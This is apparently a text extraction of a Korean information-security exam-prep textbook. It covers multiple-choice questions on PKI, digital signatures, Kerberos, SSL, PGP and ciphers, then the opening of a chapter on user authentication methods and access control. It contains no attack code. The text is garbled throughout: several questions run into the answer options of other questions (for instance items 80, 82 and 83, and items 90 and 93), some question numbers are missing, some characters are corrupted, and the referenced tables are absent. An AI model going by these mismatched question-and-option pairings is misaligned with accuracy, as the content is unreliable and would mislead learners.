타입 ➃ 제 3자 간에 인증할 수 있는 방법 제공 ➀ 인증서의 발급기능의 강화 ➁ 사용자의 인증방식의 강화 ➂ 인증서의 취소방식의 강화 ➃ 키 또는 인증서의 복구 기능의 강화 54. PKI 구성 요소가 아닌 것은? ➀ CRL: 인증서의 취소목록 ➁ CA: 사용자에게 인증서를 발급하고 다른 CA와의 상호 인증을 담당 ➂ PAA: 전체 PKI 시스템 내에서 수행되는 정책 설정을 담당 ➃ ORA: 사용자와 CA 중간에서 인증서 발급 요청 및 대리 전달 역할 55. 인증서 소유자의 개인키 유출 및 신용 취소 등의 이유로 인증기간이 만료되지 않은 경우라도 인증서를 취소할 필요가 있으면 인증서를 취소할 수 있으며 인증서 취소목록(CRL: Certificate Revocation List)에 등록된다. 인증서 취소 목록의 내용으로 들어가지 않는 것은? ➀ 최근 수정일 ➁ 발급자의 서명 ➂ 소유자의 공개키 ➃ 취소 이유 56. PKI는 다음과 같이 다양한 방식으로 정의 될 수 있다. 다음의 설명 중 옳지 않은 것은? ➀ PKI는 공개키 암호기술이 안전하게 사용될 수 있는 환경을 제공하는 인프라이다. ➁ 협의의 PKI의 정의는 인증서만 배달하는 시스템이다. ➂ PKI는 공개키와 그 소유자를 인증서를 이용하여 연결하는 시스템이다. ➃ PKI는 키 및 인증서 관리를 제공하기 위한 신뢰성 있는 서비스들의 집합체이다. 266
267 57. PKI 구성 객체의 기능 중 사용자의 신분확인과 PKI를 이용하는 응용과 CA 간 인터페이스를 제공하는 역할을 수행하는 객체는 무엇인가? ➀ 인증기관(CA) ➁ 인증서취소목록(CRL) ➂ 등록기관(RA) ➃ 디렉터리(Directory) 58. PKI의 기능 중 상호인증에 대한 설명 중 틀린 것은? ➀ 상호인증은 서로관련이 없는 CA와 CA간에 서로가 발행한 인증서를 상호 인정해주는 과정이다. ➁ 상호인증은 각 인증기관의 인증 정책에 대한 합품? 우선하여야 한다. ➂ 상호인증은 인증기관 상호간에 서로 인증서를 요구하며, 요구한 인증서 내에 포함될 공개키에 대한 비밀키 소유 여부를 확인하고 확인이 끝난 후 서로 인증서를 발행한다. ➃ 인증서의 상호발행 후 각 인증기관은 각 기관의 데이터베이스에 인증서를 저장하고 반드시 디렉터리에 상호 인증한 인증서를 공개한다. 59. PKI 인증서를 실시간으로 상태를 확인할 수 있는 온라인 메커니즘은 무엇인가? ➀ OCSP ➁ PKIX ➂ PKCS ➃ X 전자서명에서 송신자와 수신자의 메시지 전송 도중에 갈취되어 복사되거나 도용되지 않도록 해주는 특성을 무엇이라고 하는가? ➀ 재사용 방지 ➁ 부인 방지 ➂ 인증 ➃ 데이터의 무결성 61. 다음은 무엇에 대한 설명인가? 암호의 고유 기능인 정보보호기능과 인증기능 중에 인증 기능을 활용하면 서명에 참여한 사용자 인증과 서명 대상인 전자 문서의 인증을 동시에 실행함으로써 ( )의 효과를 얻을 수 있다. ➀ 메시지 인증(Message Authentication) ➁ 사용자 인증(User Authentication) ➂ 전자서명(Digital Signature) ➃ 프라이버시(Privacy) 62. 다음은 전자서명의 특징으로 합법적인 서명자만이 전자서명을 생성할 수 있어야 하는 특징은 무엇인가? ➀ 서명자 인증 ➁ 부인불가 ➂ 변경불가 ➃ 위조불가 63. 전자서명과 전송 메시지의 암호화를 통하여 송신자의 인증과 전송 메시지의 기밀성을 확보할 수 있는 키의 조합으로 타당한 것은? ➀ 송신자의 개인키로 서명하고 수신자의 공개키로 암호화한다. ➁ 송신자의 공개키로 서명하고 수신자의 개인키로 암호화한다. ➂ 수신자의 개인키로 서명하고 송신자의 공개키로 암호화한다. ➃ 수신자의 공개키로 서명하고 송신자의 개인키로 암호화한다. 64. PMI에 대한 설명으로 틀린 것은? ➀ PKI(공개키 기반 구조)와 비슷한 구조를 가지고 있다. ➁ 속성 인증서(Attribute Certificate)를 발급, 갱신, 관리해주는 정보보호 기반 구조를 말한다. ➂ 기존의 신원 확인용 인증서와는 전혀 다른 구조의 인증서를 발급한다. ➃ 사용자의 권한 정보 관리를 통한 접근 제어 서비스를 지원한다. 267
268 65. PMI에 대한 설명으로 틀린 것은? ➀ PMI는 PKI의 단점을 보완해주는 새로운 정보보호 인프라 체계다. ➁ PKI가 전자서명을 이용한 사용자 인증에 중점을 두고 있다면, PMI는 인증 소유자들의 특정 권한 등을 사용자 속성(Attribute)으로 정의한다. ➂ PKI가 출 입국자의 신원확인을 위한 여권이라면, PMI는 각 국가별 출입허가 정보를 담은 비자와 같은 기능으로 예를 들을 수 있다. ➃ PMI에서는 일반적으로 사용자의 신원확인과 사용자의 권한정의를 동시에 정의한다. ➃ 워터마킹이 삽입된 원본 미디어의 경우 어떠한 경우에도 훼손되지 않으며 저작권 정보가 추출 가능하다. 68. 암호 해독자는 현재 사용되고 있는 암호 방식을 알고 있다는 것을 전제로 암호해독을 시도한다는 원리는 무엇인가? ➀ 공개키 암호원리 ➁ Shannon 원리 ➂ Diffie-Hellman 원리 ➃ Kerckhoff 원리 69. 다음 중 블록암호의 설명으로 틀린 것은? 66. 디지털 콘텐츠 저작권 보호 기술은 크게 적극적인 콘텐츠 보호(Active Content Protection) 기술과 소극적인 콘텐츠 보호기술 (Passive Content Protection)로 유형이 나누어진다. 디지털 컨텐츠 저작권 보호 기술에 대한 설명으로 틀린 것은? ➀ 적극적인 콘텐츠 보호 기술은 콘텐츠의 사용을 제한하는 기술로 사용규칙을 정의하고 그 범위 내에서만 콘텐츠가 사용되도록 하는 기술을 말한다. ➁ 소극적인 콘텐츠 보호 기술로는 콘텐츠의 사용을 제한하지는 않으나 저작권자의 정보나 사용자의 정보를 안전하게 표시하는 기술을 말한다. ➂ 워터마킹은 적극적인 컨텐츠 보호 기술이다. ➃ DRM은 적극적인 컨텐츠 보호 기술이다. 67. 다음 중 워터마킹에 대한 설명으로 옳은 것은? ➀ 워터마킹이란 저작권을 보호하고자 하는 대상에 저작권 정보를 삽입하는 기술을 말한다. ➁ 사용자는 워터마킹이 삽입된 데이터에서 저작권 정보를 눈으로 식별할 수 있다. ➂ 워터마킹 기술을 사용하여 디지털 컨텐츠의 불법사용과 기밀정보의 유출 등과 같은 위협을 차단할 수 있다. ➀ 블록암호의 이론적 토대는 대치와 치환을 반복하므로 평문과 암호문으로부터 키에 대한 정보를 찾기가 어렵다는 데 있다. ➁ DES는 블록암호의 대표적인 알고리즘으로 현재까지 미국표준암호로 사용 중이다. ➂ 국내 블록암호 표준으로는 SEED 가 있다 ➃ 블록암호의 이론적 안전성은 안전한 암호와의 평문 암호문의 분포 특성 차이로 평가 한다. 70. 다음 중 전자서명(Digital Signature)의 조건의 설명으로 틀린 것은? ➀ 위조 불가 조건 (Unforgeable): 합법적인 서명자만이 전자 문서에 대한 전자 서명을 생성할 수 있어야 한다. ➁ 서명자 인증 조건(Authentic) : 전자 서명의 서명자를 누구든지 검증할 수 있어야 한다. ➂ 부인 불가 조건 (Nonrepudiation) : 서명자는 서명 후에 자신의 서명 사실을 부인할 수 없어야 한다. ➃ 재사용 조건( Reusable) : 전자 문서의 서명은 다른 전자 문서의 서명으로 사용될 수 있어야 한다. 268
269 71. 다음 중 해쉬함수의 사용의 필요성이 아닌 것은? ➀ 데이터의 비밀성 제공 ➁ 전자서명 속도의 효율성 제공 ➂ 메시지 거대화 방지 ➃ 데이터의 무결성 제공 74. 영지식 개인식별 프로토콜에서 정당한 증명자(클라이언트)만이 알고 있는 비밀 정보 를 알고 있다는 사실을 검증자(서버)에게 입증시키는 것을 무엇이라 하는가? ➀ 증거(witness) ➁ 정보(information) ➂ 통지(inform) ➃ 증명(proof) 72. 다음 패스워드 기반 개인식별 프로토콜에 대한 설명 중 틀린 것은? 75. 자료의 일치성, 데이터 무결성, 시각과 유일성을 보장하는 인증을 무엇이라 하는가? ➀ 패스워드는 기억하기 쉽기 때문에 인증에서 주로 이용되는 대상이다. ➁ 패스워드는 기억하기 쉬운 것으로 하기 위해 사용자의 ID나 주민등록 번호등에서 유추하기 쉬운 것으로 사용하는 것이 좋다. ➂ 안전을 위해 사용자의 패스워드를 일방향 함수로 암호화하여 시스템에 저장하는 방식을 사용한다. ➃ 일회용 패스워드는 특별 세션에서 해당 패스워드가 노출되어도 다음 세션에 사용될 패스워드를 예측할 수 없는 장점이 있다. 73. 다음 시도-응답 개인식별 프로토콜의 설명 중 잘못된 것은? ➀ 클라이언트 자신만이 소유하고 있는 어떤 비밀 정보를 자신이 알고 있다는 사실을 간접적으로 보여주는 프로토콜이다. ➁ 서버가 클라이언트에게 신분 증명을 요청 시 무작위하고 비밀리에 선정한 수의 형태로 제시해야 한다. ➂ 클라이언트의 응답은 비밀정보와 서버가 요청한 시도에 따라 결정된다. ➃ 공격자가 클라이언트와 서버의 통신을 도청한 후 그 정보를 이용해 클라이언트를 가장하여 개인 식별 인증을 받을 수 있으므로 주의해야 한다. ➀ 실재인증 ➁ 메시지 인증 ➂ 키인증 ➃ 거래인증 76. 다음 키 분배 프로토콜들 중 대칭키 암호 방식에 기반을 둔 분배 방식으로 사용자와 TA가 DES의 비밀키를 공유하며 CBC 모드를 사용하여 암호화는 방식을 사용하는 것은? ➀ Kerboros ➁ STS(Station To Station) ➂ MTI ➃ Girault 키 공유 프로토콜 77. 다음 중 전자투표를 구현할 때 부정투표자에 의한 선거 방해를 막기 위해 요구되는 조건은 무엇인가? ➀ 건전성 ➁ 완전성 ➂ 익명성 ➃ 검증가능 78. 다음 중 전자화폐가 복사되거나 위조된 경우에는 사용할 수 없도록 하는 조건은 무엇인가? ➀ 건전성 ➁ 완전성 ➂ 익명성 ➃ 양도성 269
270 79. 다음 위임서명의 설명 중 틀린 것은? 82. 다음 특수서명의 설명 중 틀린 것은? ➀ 서명을 해야 할 사람이 부재 중에 자신을 대리해서 서명을 할 수 있는 서명 방식이다 ➁ 위임서명에서 서명자는 위임 서명자에게 자신의 비밀키를 포함시킨 위임 서명키를 비밀리에 위임 서명자에게 전달해야 한다. ➂ 위임서명은 위임 서명키 생성 및 전달과정과 위임서명과정으로 구성 된다. ➃ 위임서명을 확인하는 검증자는 위임서명을 위임한 원래 서명자의 동의가 있었음을 확인하기 위해 서명자에게 확인절차를 거쳐야 한다. 80. Shamir의 비밀분산방식을 영지식 증명과 함께 구성하여 불확정 전송 프로토콜과 함께 암호프로토콜을 설계하는데 유용하게 사용되는 방식은 무엇인가? ➀ 위임서명에서 서명자는 위임 서명자에게 자신의 비밀키를 포함시킨 위임 서명키를 비밀리에 위임 서명자에게 전달해야 한다. ➁ 부인방지 전자서명은 자체 인증 방식을 배제시켜 서명을 검증할 때 반드시 서명자의 도움이 있어야 검증이 가능한 전자 서명 방식이다. ➂ 특수서명으로는 부인방지 전자서명, 은익서명, 위임서명들이 있다 ➃ 은익서명은 서명자가 서명문 내용을 알고 그것을 은익하기 위하여 서명하는 전자 서명방식이다. 83. 전자우편 보안을 위한 PGP에서 다음 중 메시지 암호화에 사용되지 않는 암호 알고리즘은 무엇인가? ➀ 은익비밀분산 ➁ 증명가능 비밀분산(VSS) ➂ Threshold 비밀분산 ➃ Diffie-Hellmann 81. 대화형 프로토콜이 대화형 증명 시스템 (Interactive proof system)이 되기 위해서 필요한 조건은 무엇인가? 가. 영지식성(Zero-Knowledge) 나. 완전성(Completeness) 다. 건전성(Soundness) 라. 구별불가능성(indistinguishable) ➀ 가, 나 ➁ 나, 다 ➂ 다, 라 ➃ 가, 라 ➀ Triple-DES ➁ IDEA ➂ CAST-128 ➃ Rijndael 84. S/MIME이 지원하는 보안 서비스의 설명중 틀린 것은? ➀ 전자서명을 위한 해쉬함수는 SHA-1을 권장한다. ➁ 전자서명을 위하여는 DSS를 반드시 지원해야 한다. ➂ 세션키 전송시 암호화기능을 위해 ElGamal 방식을 모두 지원해야 한다. ➃ 세션키를 통한 메시지 암호화를 위해 Triple-Des을 지원을 권장한다. 85. SSL이 클라이언트와 서버 사이에 안전한 데이터통신을 위해 제공하는 기능이 아닌 것은? ➀ 두 응용간의 기밀성 ➁ 클라이언트와 서버의 상호 인증 ➂ 전송데이터의 간결성 ➃ 메시지 무결성 270
271 86. 현재 Kerberos 를 구현할때 사용되는 알고리즘은 무엇인가? 92. 다음 중 SET(Secure Electronic Transactions) 표준에서 제공하는 기본서비스가 아닌 것은? ➀ RSA ➁ DES ➂ SKIPJACK ➃ IDEA 87. 다음 중 키관리에 속하지 않는 것은? ➀ 인증(Authentication) ➁ 기밀성(Confidentiality) ➂ 메시지 무결성 ➃ 트랜잭션 은닉 ➀ 키의 분배 ➂ 키의 사용 ➁ 키의 생성 ➃ 키의 폐기 93. 다음 중 KISA를 시저 사이퍼(Caesar Cipher) 로 암호화한 단어는? 88. 다음 중 블럭사이퍼(block ciphers)의 약점은 무엇인가? ➀ 국제 표준에 의하여 권고되지 않음 ➁ 데이터의 크기가 탓?클 경우에 비효율적임 ➂ 구현하기가 어려움 ➃ 데이터의 크기가 작을 경우에 비효율적임 89. 암호화의 기본 전제는 무엇인가? ➀ 메시지를 읽을 수 있도록 함 ➁ 메시지를 읽을 수 없도록 함 ➂ 메시지에 데이터를 추가함 ➃ 메시지를 보다 효율적으로 만듦 90. 전자 서명을 생성할 때, 개인키를 이용하여 암호화되는 것은? ➀ 메시지 ➁ 해시 ➂ 또 다른 개인 키 ➃ 공개 키 ➀ NLVD ➁ VDQV ➂ TBOT ➃ SNAS ➄ TMCV 94. 다음 중 암호기법의 주된 목표는 무엇인가? ➀ 외부 네트워크 침입을 막기 위해서 ➁ 중간 도청자(eavesdropper)를 물리치기 위해 ➂ 메시지를 가로채는 공격자로부터 메시지를 보호하기 위해 ➃ 네트워크 트래픽에서 공격 징후를 감시하기 위해 95. 커버러스(Kerberos)의 티켓이 매우 커지는 경우, 다음 중 어떤 포트가 사용될 수 있는가? ➀ UDP/88 ➁ TCP/88 ➂ UDP/89 ➃ TCP/ 다음 중, 비밀키 암호기법이 아닌 것은? 91. 다음 중 대칭키 암호화 알고리즘의 강점이 아닌 것은? ➀ AES ➂ Diffie-Hellman ➁ DES ➃ Blowfish ➀ 키 보안 ➁ 구현의 용이함 ➂ 신속성 ➃ 연동성 97. 다음 용어 중에서 네트워크 계층에의 암호 응용을 설명하는 것은? ➀ Virtual Private Networking (VPN) ➁ Pretty Good Privacy (PGP) ➂ Public Key Infrastructure (PKI) ➃ Standard Encrypted Networking (SEN) 271
272 98. SSL은 TCP/IP의 어떤 계층에 암호화를 제공하는가? 104. 다음 중 모바일 전화로 인터넷을 접속할 때 사용하는 프로토콜은? ➀ 전송 ➁ 링크 ➂ 네트워크 ➃ 물리 99. ECC 알고리즘은 다음 중 무엇을 지원하는 데 사용될 수 있는가? ➀ 암/복호화 ➁ 전자서명 ➂ 암/복호화 및 전자 서명을 지원하지 못한다 ➃ 암/복호화 및 전자 서명 ➀ WAP (Wireless Application Protocol) ➁ WEP (Wired Equivalent Privacy) ➂ 블루투스(Bluetooth) ➃ HTTP 105. 모바일 전화나 랩탑을 이용하여 인터넷에 접속할 때, 어떤 프로토콜이 이용되는가? ➀ SET ➁ WEP ➂ WAP ➃ 블루투스(Bluetooth) 100. 다음 VPN에 대한 설명 중 옳지 않은 것은? ➀ VPN은 전용선에 비해 가격이 고가이다. ➁ VPN은 평문을 암호화하여 암호문으로 만든다 ➂ VPN은 암호기법을 이용하여 기밀성을 제공한다. ➃ VPN은 원격에서 안전하게 내부 네트워크 자원에 접근하도록 한다 다음 중 매우 큰 정수를 소인수 분해하는 기법을 사용하는 알고리즘은? ➀ Diffie-Hellman ➁ DSA ➂ RSA ➃ El Gamal 106. 다음은 암호 시스템을 사용하는 일반적인 원칙이다. 올바르지 않은 것은 무엇인가? ➀ 암호 시스템에서 키를 제외한 모든 부분은 공개되어 있다고 고려한다. ➁ 암호 알고리즘은 안전성을 좌우하는 중요한 요소이기 때문에 비공개가 원칙이다. ➂ 여러 가지 공격 방법을 고려하여 될 수 있는 한 키를 자주 변경해야 한다. ➃ 암호 알고리즘은 충분한 안전성을 확보하기 위하여 주기적인 재평가가 이루어져 ➄ 평문을 암호화할 때에는 먼저 압축한 후에 암호화하는 것이 바람직하다 암호기법을 이용하여 정보 엿보기 방지하는 것을 무엇이라 하는가? 107. 블록 암호의 사용 방식 중 데이터 암호용으로 적합하지 않은 모드는? ➀ 기밀성 ➂ 인증 ➁ 무결성 ➃ 부인봉쇄 ➀ ECB 모드 ➂ CFB 모드 ➁ CBC 모드 ➃ OFB 모드 103. 다음 중 어떤 무선 프로토콜이 WTLS (Wireless Transport Layer Security)를 사용하는 가? ➀ 블루투스(Bluetooth) ➁ 적외선 ➂ WAP (Wireless Application Protocol) ➃ WEP (Wired Equivalent Privacy) 272
273 108. 다음은 RSA 공개키 암호의 시스템 변수 선택에 관한 내용이다. 올바른 것은? ➀ 공개키 e 와 개인키 d 는 ed equiv 1 mod phi(n) 의 관계식이 만족하도록 선택된다. ➁ 공개키 e 는 암호화 속도를 증가시키기 위해 보통 3으로 고정된다. ➂ 스마트 카드와 같은 환경에서는 복호화 속도를 높이기 위해 개인키 d 를 n^1/4 보다 작은 값으로 선택한다. ➃ 공개키 n 의 두 약수 p,q 의 차는 충분히 크게 선택한다. ➄ 공개키 n 의 두 약수 p,q 는 Strong Prime의 조건을 만족해야 한다. 273
274 제 5장. 사용자 인증 및 접근 통제 제 1절. 사용자 인증 chapter 1. 사용자 인증 개요 chapter 2. 사용자 인증 기술 제 2절. 접근 통제 chapter 1. 접근 통제 개요 chapter 2. 접근 통제 모델 chapter 3. 접근 통제 시스템 제 3절. 사용자 인증 및 접근 통제 문제 풀이 chapter 1. 종합 문제 274
275 제 1절. 사용자 인증 chapter 1. 사용자 인증 개요 가. 사용자 인증 시 보안 요구 사항 사용자가 정보 자산에 접근을 요청할 때 시스템과 관리자는 사용자의 실재( 實 在 ), 사용자의 확인 그리 고 권한의 부여와 같은 인증 허가의 일련의 과정을 거치게 된다. 이런 일련의 과정에서 사용자의 식별 및 인증, 사용 권한의 허가 그리고 책임추적성 보장 등의 메커니즘이 요구된다. 다음 [표 3-1]은 사용자 인증 시 요구되는 보안 요구사항이다. 275
276 나. 사용자 인증 종류 다음 [표 3-2]는 사용자 인증 방식을 구분한 것이다. chapter2. 사용자 인증 기술 사용자를 인증하는 방법에는 크게 사용자가 알고 있는 것을 이용하는 방법과 사용자가 소유한 것을 이 용하는 방법, 사용자의 특성을 이용하는 방법이 있으며, 각각에 따른 사용자 인증 기술은 아래 [표 3-3]과 같다. 가. 패스워드 사용자 인증 기술로 가장 널리 사용되는 방식으로 사용자만이 알고 있는 정보(패스워드)를 입력함으로 써 사용자 인증을 수행한다. 이 방식은 가장 간편한 동시에 보안상 가장 취약한 인증 기술로써 다른 사용자가 패스워드를 추측할 수 없도록 하는 것이 보안상 가장 중요하다. 따라서 패스워드 설정 시 타인이 추측하기 어려우나 본인은 기억하기 쉬운 패스워드를 이용하여야 한 다. 276
277 나. 일회용 패스워드 사용자의 아이디와 패스워드를 인증 기반으로 사용하는 시스템에서의 패스워드는 누출에 대한 많은 위 험성과 그것에 대한 해킹 방법들이 많이 알려져 있다. 이러한 문제점을 보안하기 위하여 일회용 패스 워드(OTP: One Time Password)가 쓰이기 시작하였다. 일회용 패스워드는 새로운 로그온 시도마다 새 로운 패스워드가 사용되며 한번 사용된 패스워드는 더 이상 사용할 수 없다. 따라서 공격자가 통신망에서 현재 사용되고 있는 패스워드를 알아낸다고 하더라도 그 패스워드를 사용 할 수 없으므로 보안성이 보장된다. 다. 개인 식별 번호 현금자동지급기나 전자투표와 같은 장치에 대한 접근 관리를 위해 개인에게 부여된 개인 식별번호 (PIN: Personal Identification Number)로 일정한 알고리즘을 이용해 생성되며, 일련번호 형태로 제공된 다. 패스워드 등과 같이 사용자가 알고 있는 것(What you know)에 의존한 인증 방식이다. 라. 암호구 암호구(Pass Phrase)는 연속적인 문자들의 집합으로 일반적으로 사용하는 패스워드보다는 더 긴 길이 의 비트 열로 작성된 패스워드이다. 암호구는 패스워드와 같은 개념으로 사용자가 응용프로그램(예, PGP(Pretty Good Privacy))에 로그온하려면 해당 응용프로그램은 사용자가 비밀키를 써야하는 작업마 다 암호구를 입력하라고 요구하는데 이는 비밀키 자체가 이 암호구에 의해서 암호화되어 저장되었기 때문이다. 또한 암호구는 일반적인 패스워드보다는 더 긴 비트 열을 이용하고 암호화기법을 사용하기 때문에 더 안전하다할 수 있다. 마. 메모리 카드 우리가 일반적으로 사용하는 은행의 현금카드나 신용카드 등의 마그네틱 카드도 자기 띠를 이용한 메 모리 카드(Memory Card)라 할 수 있다. 메모리 카드는 데이터의 저장은 가능하나 데이터를 처리할 수 는 없다. 메모리 카드에는 사용자의 인증을 위한 정보를 포함하고 있으며, 두 가지 이상의 인증 정보를 이용하여 사용자를 인증한다. 예를 들어 메모리카드(what you have)와 개인 식별번호(what you know)를 혼합하여 사용하는 것 등이 다. 바. 스마트카드 스마트카드(Smart Card) 또는 칩 카드(Chip Card)는 신용카드 정도의 크기의 플라스틱으로 만들어져 있으며, 데이터를 저장할 수 있는 전자회로가 내장되어 있고, 교통카드와 전자화폐 등 다양한 용도로 사용될 수 있으며 주기적으로 충전하여 재사용할 수 있다. 또한 스마트카드는 메모리 카드보다는 보안성이 강하며 메모리 카드가 제공하지 못하는 다양한 기능의 제공으로 많은 관심과 연구가 진행되고 있다. 277
278 사. 생체인식 기술 (1) 생체인식 기술 개요 생체인식 기술이란 살아있는 사람의 신원을 생리학적으로 또는 행동 특징을 기반으로 인증하거나 인식 하는 자동화된 기법을 말한다. 생체인식 시스템은 크게 생리적인 특징을 이용한 지문, 얼굴, 망막, 혈관 패턴, 홍채, 손목 또는 손등의 정맥분포 패턴, DNA를 식별하는 방식이 있고 사람의 행위나 형태적 특 성을 이용한 서명과 음성인식 등의 방법이 있다. (2) 생체인식 기술 요구 사항 사용자 인증 시스템으로써 생체인식 기술에 요구되는 생체의 특성은 다음과 같다. o보편성(universal) : 누구나 가지고 있는 생체의 특성을 이용하여야 한다. o유일성(unique) : 각 개인마다 고유한 특성이 있어야 한다. o영속성(permanent) : 변하지 않고 변경이 불가능해야 한다. o정량성(collectable) : 생체인식 시스템의 센서에 의한 획득과 정량화가 용이해야 한다. 생체인식 기술의 정확성을 측정하는 기준은 다음 [표 3-4]와 같다. 아. SSO 네트워크 사용자들은 그들이 사용하는 여러 서버들을 위해서 다수의 패스워드를 기억하고 있어야 한 다. 예를 들어 한 사용자가 네트워크 접속, 전자메일 사용, 디렉토리 서비스 사용, 조직의 프로그램 사 용 그리고 기타 여러 가지 서비스에 접근하기 위해서는 접속할 때마다 서로 다른 패스워드의 입력 절 차를 거쳐야 하며 이것은 매우 번거로운 작업이다. 또한 관리자들은 각각의 서버에 분리된 암호 데이 터베이스를 만들어야 하며 패스워드가 네트워크를 통해 자주 전달되기 때문에 이에 따른 보안 관리의 부담이 생기게 된다. SSO(Single Sign-On)란 사용자가 단 한 번의 로그인 절차를 거친 것만으로 조직의 모든 업무 시스템이 나 인터넷 서비스에 접속할 수 있게 해주는 서비스로서, 사용자는 하나의 패스워드로 로그인하면 다른 인증 절차를 거치지 않더라도 자신의 사용권한이 있는 모든 네트워크 자원에 접근할 수 있는 권한을 부여한다. 관리자의 입장에서도 훨씬 적은 수의 사용자와 패스워드를 관리하게 되므로 네트워크 관리 278
279 를 단순화시켜 인력이나 비용을 절감시키는 이점이 있다. 특히 최근의 SSO 기술은 인증된 사용자에게 시스템 정보 및 자원에 접근할 수 있는 권한은 물론 중요 접근제어 권한까지 부여하는 EAM으로 발전되는 추세이다. 다음 [표 3-5]는 SSO와 응용프로그램 인증 방식간의 차이를 설명한다. 자. EAM (1) EAM 개요 EAM(Extranet Access Management)은 SSO에 권한에 따른 자원 접근 통제(Access Control) 개념을 포 함시킨 확장 기술이다. 기업 내부의 사용자와 함께 외부 직원 및 협력업체, 고객 등의 외부 사용자들이 접근할 수 있는 자원에 대한 권한을 관리, 제어함으로써, 기업 내 중요 정보에 비인가된 사용자가 접근 하는 것을 방지하는 역할을 한다. 초기에는 웹 서버상의 자원에 대한 관리만 가능하였으나 현재는 다양한 어플리케이션에 대한 관리가 가능하다. (2) EAM 관리 요소 o 사용자(User) 자원에 접속을 요구하는 주체를 말한다. 예를 들어 사람, 네트워크 장비, 프로그램등이며 소속, 지리적 위치, 역할 등에 따라서 Group 또는 Role로 구분할 수 있다. o 자원(Resource) 접속이 요청되는 객체를 말한다. - Web : html file, directories, CGI, JSP, ASP files 등 - File System : directories, files 등 - Database : tables, rows, columns 등 279
280 o 오퍼레이션(Operation) 주체가 객체에게 접근 시 요구하는 행위를 말한다. - Web : GET, POST, PUT - File System : read, write, execute - Database : select, insert, delete, queries 등 (3) EAM 구축 효과 o 자원에 대한 접근 제어를 통한 보안성 향상 o 다양한 사용자 인증 방법 제공(ID/PW, PKI 인증서, 생체인식, 토큰 등) o 사용자의 편리성과 관리 업무의 효율성 증대 o 업무 효율성으로 인한 비용 절감 효과 차. TACACS TACACS는 유닉스 네트워크에 적용되는 인증 프로토콜로, 주어진 시스템에 접근을 허용할 것인지를 결 정하기 위해 원격 액세스 서버가 사용자의 인증 정보를 인증 서버에 전달할 수 있게 해준다. 암호화되 지 않은 프로토콜로 그 이후 나온 TACACS+와 RADIUS 프로토콜은 암호화가 지원된다. TACACS+는 TACACS의 인증 강화 버전이지만 XTACACS나 TACACS와 호환되지는 않는다. 그리고 SLIP/PPP와 telnet의 인증에 추가적으로 S/key, CHAP, PAP를 통한 인증을 허용한다. 인증과 인가가 분 리되어 있으며 개별적으로 구성이나 구현하도록 할 수 있다. 카. RADIUS RADIUS(Remote Authentication Dial-in User Service)는 사용자 인증 프로토콜이다. 인터넷의 발달로 사무실에 출근하지 않고 집에서 근무하는 재택근무자가 늘고 있는데 이러한 재택근무자와 이동 근무자 가 다이얼 업 네트워킹을 통해서 본사 네트워크에 접속할 때 사설 네트워크의 경계를 보호하기 위한 것이 바로 RADIUS이다. RADIUS는 RAS가 다이얼 업 모뎀을 통해 접속해온 사용자들을 인증하고, 요청된 시스템이나 서비스에 관해 그들에게 액세스 권한을 부여하기 위해, 중앙의 서버와 통신할 수 있게 해주는 클라이언트/서버 프로토콜이다. RADIUS 서버는 중앙의 데이터베이스 내에 사용자의 인증 정보(이름, 패스워드 등)를 일 괄적으로 관리하여 액세스 서버에 접속할 수 있게 한다. 다음 [표 3-6]은 RADIUS와 TACACS+와의 비교표이다. 280
281 타. 커버로스 (1) 커버로스 개요 커버로스(Kerberos)는 네트워크 사용자를 인증하는 것과 관련하여 미국 MIT의 Athena 프로젝트에서 개발된 네트워크 인증 표준이다. 커버로스는 개방된 안전하지 않은 네트워크 상에서 사용자를 인증하 는 시스템이며 DES와 같은 암호화 기법을 기반으로 하기 때문에 그 보안 정도는 높다고 할 수 있다. 커버로스는 티켓이라는 것으로 사용자를 인증하고, 보안상으로 볼 때 좀 더 안전하게 통신할 수 있게 한다. (2) 커버로스 동작 원리 텔넷(Telent)이나 기타 이와 비슷한 로그인 요청을 통해, 다른 컴퓨터에서 서버에 접근을 요청한다고 가정하였을 때, 이 서버는 로그인 요청을 받아들이기 전에 커버로스 티켓을 요구한다. 티켓을 받기 위 하여 접속자는 먼저 인증 서버에 인증을 요구한다. 인증 서버는 요구자가 입력한 패스워드에 기반을 두어 세션키와 서비스 요구를 나타내는 임의의 값을 만든다. 세션키는 사실상 티켓을 부여하는 티켓 이다. 그 다음에 세션키를 티켓 부여 서버인 TGS(Ticket Granting Server)에 보낸다. TGS는 서비스를 요청할 때 서버에 보낼 수 있는 티켓을 돌려준 다. 그 서비스는 티켓을 거절하거나, 또는 받아들여서 서비스를 수행한다. TGS로부터 받은 티켓은 발송일자와 시간이 적혀있기 때문에, 일정 시간(대체로 8시간) 내에는 재인증 없이도 동일한 티켓으로 다른 추가 서비스를 요청할 수 있다. 티켓을 제한된 시간 동안에만 유효하게 만듦으로써, 후에 다른 사람이 그것을 사용할 수 없도록 한다. 281
282 제 2절. 접근 통제 chapter 1. 접근 통제 개요 가. 접근 통제 개요 접근 통제(Access Control)는 자원에 대한 비인가된 접근을 감시하면서 접근을 요구하는 이용자를 식별 하여, 사용자의 접근 요구가 정당한 것인지를 확인 및 기록하고, 보안 정책(Security policy)에 근거하여 접근을 승인하거나 거부함으로써 비인가자에 의한 불법적인 자원 접근 및 파괴를 예방하는 하드웨어, 소프트웨어 그리고 행정적인 관리(Administration)를 총칭한다. 접근 통제를 적용하기 위해서는 신분확인 과정을 통해 객체(Object)에 접근하려는 주체(Subject)의 신 분이 먼저 확인되어야 한다. 접근 통제에서의 접근 여부는 신분확인에 의해 시스템에 접근여부를 허가 하는 것과는 구분이 되어야 하는데, 신분 확인에서는 식별(Identification) 및 인증(Authentication)을 통 해 사용자가 정당한 사용자인지를 확인하여 정당한 사용자가 아닌 경우에 접근을 거부하는 방식으로 통제하는 것이다. 접근 통제에서는 접근 통제 객체에 대해 사용을 요청한 사용자가 요청한 형태의 접근을 허가받았는지를 확인하여 접근을 통제하는 것으로 구분할 수 있다. 나. 접근 통제 원칙 접근이란 주체와 객체간의 정보의 흐름으로 주체는 능동적인 성질을 갖고 있고 객체는 수동적인 성질 을 가진다. 주체라고 하면 보통 정보를 요청하는 사용자라고만 생각할 수 있으나, 실제로 시스템 자원 에 접근을 요청하는 주체에는 다양한 형태가 존재할 수 있으며 객체 또한 여러 가지 형태가 있다. 접근 통제는 주체와 객체의 관점에서 누가, 무엇을, 어떻게 접근하도록 할 것인지를 결정함에 있어, 다 음 [표 3-7]에 나타난 것과 같은 원칙을 적용한다. 282
